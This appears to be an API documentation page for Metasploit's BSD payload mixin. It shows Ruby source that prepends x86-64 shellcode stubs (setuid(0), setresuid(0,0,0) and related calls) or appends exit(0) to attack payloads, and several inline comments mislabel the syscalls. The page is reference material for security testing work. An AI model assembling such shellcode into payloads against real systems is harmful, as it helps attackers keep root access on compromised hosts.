Module: Msf::Payload::Bsd

Includes:
X86
Defined in:
lib/msf/core/payload/bsd.rb,
lib/msf/core/payload/bsd/x86.rb

Overview

Contains common x86 BSD code

Defined Under Namespace

Modules: X86

Instance Method Summary collapse

Methods included from X86

#bsd_x86_exec_payload, #handle_x86_bsd_opts

Instance Method Details

#apply_prepends(buf) ⇒ Object 



76
77
78
79
80
81
82
83
84
85
86
87
88
 
# File 'lib/msf/core/payload/bsd.rb', line 76

def apply_prepends(buf)
  test_arch = [ *(self.arch) ]
  pre = ''
  app = ''

  if (test_arch.include?(ARCH_X86))
    handle_x86_bsd_opts(pre, app)
  elsif (test_arch.include?(ARCH_X64))
    handle_x64_bsd_opts(pre, app)
  end

  pre + buf + app
end

#handle_x64_bsd_opts(pre, app) ⇒ Object 



90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
 
# File 'lib/msf/core/payload/bsd.rb', line 90

def handle_x64_bsd_opts(pre, app)
  if (datastore['PrependSetresuid'])
    # setresuid(0, 0, 0)
    pre << "\x48\x31\xc0"         + # xor rax, rax
           "\x48\x83\xc8\x4d"     + # or rax, 77  (setgid=311>>2=77)
           "\x48\xc1\xe0\x02"     + # shl rax, 2
           "\x48\x83\xf0\x03"     + # xor rax, 3 (311&3=3)
           "\x48\x31\xff"         + # xor rdi, rdi 0
           "\x48\x31\xf6"         + # xor rsi, rsi  0
           "\x48\x31\xd2"         + # xor rdx, rdx  0
           "\x0f\x05"               # syscall
  end

  if (datastore['PrependSetreuid'])
    # setreuid(0, 0)
    pre << "\x48\x31\xc0"         + # xor rax, rax
           "\x48\x83\xc8\x7e"     + # or rax, 126  (setreuid=126)
           "\x48\x31\xff"         + # xor rdi, rdi  0
           "\x48\x31\xf6"         + # xor rsi, rsi  0
           "\x0f\x05"               # syscall
  end

  if (datastore['PrependSetuid'])
    # setuid(0)
    pre << "\x48\x31\xc0"         + # xor rax, rax
           "\x48\x83\xc8\x17"     + # or rax, 23  (setuid=23)
           "\x48\x31\xff"         + # xor rdi, rdi  0
           "\x0f\x05"               # syscall
  end

  if (datastore['PrependSetresgid'])
    # setresgid(0, 0, 0)
    pre << "\x48\x31\xc0"         + # xor rax, rax
           "\x48\x83\xc8\x4e"     + # or rax, 78  (setgid=312>>2=78)
           "\x48\xc1\xe0\x02"     + # shl rax, 2 (78<<2=312)
           "\x48\x31\xff"         + # xor rdi, rdi 0
           "\x48\x31\xf6"         + # xor rsi, rsi  0
           "\x48\x31\xd2"         + # xor rdx, rdx  0
           "\x0f\x05"               # syscall
  end

  if (datastore['PrependSetregid'])
    # setregid(0, 0)
    pre << "\x48\x31\xc0"         + # xor rax, rax
           "\x48\x83\xc8\x7f"     + # or rax, 127  (setuid=127)
           "\x48\x31\xff"         + # xor rdi, rdi  0
           "\x48\x31\xf6"         + # xor rsi, rsi  0
           "\x0f\x05"               # syscall
  end

  if (datastore['PrependSetgid'])
    # setgid(0)
    pre << "\x48\x31\xc0"         + # xor rax, rax
           "\x48\x83\xc8\x5a"     + # or rax, 90  (setgid=181>>1=90)
           "\x48\xd1\xe0"         + # shl rax, 1
           "\x48\x83\xc8\x01"     + # or rax, 1 (setgid=181&1=1)
           "\x48\x31\xff"         + # xor rdi, rdi  0
           "\x0f\x05"               # syscall
  end

  if (datastore['AppendExit'])
    # exit(0)
    app << "\x48\x31\xc0"         + # xor rax, rax
           "\x48\x83\xc8\x01"     + # or rax, 1  (exit=1)
           "\x48\x31\xff"         + # xor rdi, rdi  0
           "\x0f\x05"               # syscall
  end
end

#initialize(info = {}) ⇒ Object

This mixin is chained within payloads that target the BSD platform. It provides special prepends, to support things like chroot and setuid.



17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
 
# File 'lib/msf/core/payload/bsd.rb', line 17

def initialize(info = {})
  ret = super(info)

  register_advanced_options(
    [
      Msf::OptBool.new('PrependSetresuid',
        [
          false,
          "Prepend a stub that executes the setresuid(0, 0, 0) system call",
          false
        ]
      ),
      Msf::OptBool.new('PrependSetreuid',
        [
          false,
          "Prepend a stub that executes the setreuid(0, 0) system call",
          false
        ]
      ),
      Msf::OptBool.new('PrependSetuid',
        [
          false,
          "Prepend a stub that executes the setuid(0) system call",
          false
        ]
      ),
      Msf::OptBool.new('PrependSetresgid',
        [
          false,
          "Prepend a stub that executes the setresgid(0, 0, 0) system call",
          false
        ]
      ),
      Msf::OptBool.new('PrependSetregid',
        [
          false,
          "Prepend a stub that executes the setregid(0, 0) system call",
          false
        ]
      ),
      Msf::OptBool.new('PrependSetgid',
        [
          false,
          "Prepend a stub that executes the setgid(0) system call",
          false
        ]
      ),
      Msf::OptBool.new('AppendExit',
        [
          false,
          "Append a stub that executes the exit(0) system call",
          false
        ]
      ),
    ], Msf::Payload::Bsd)

  ret
end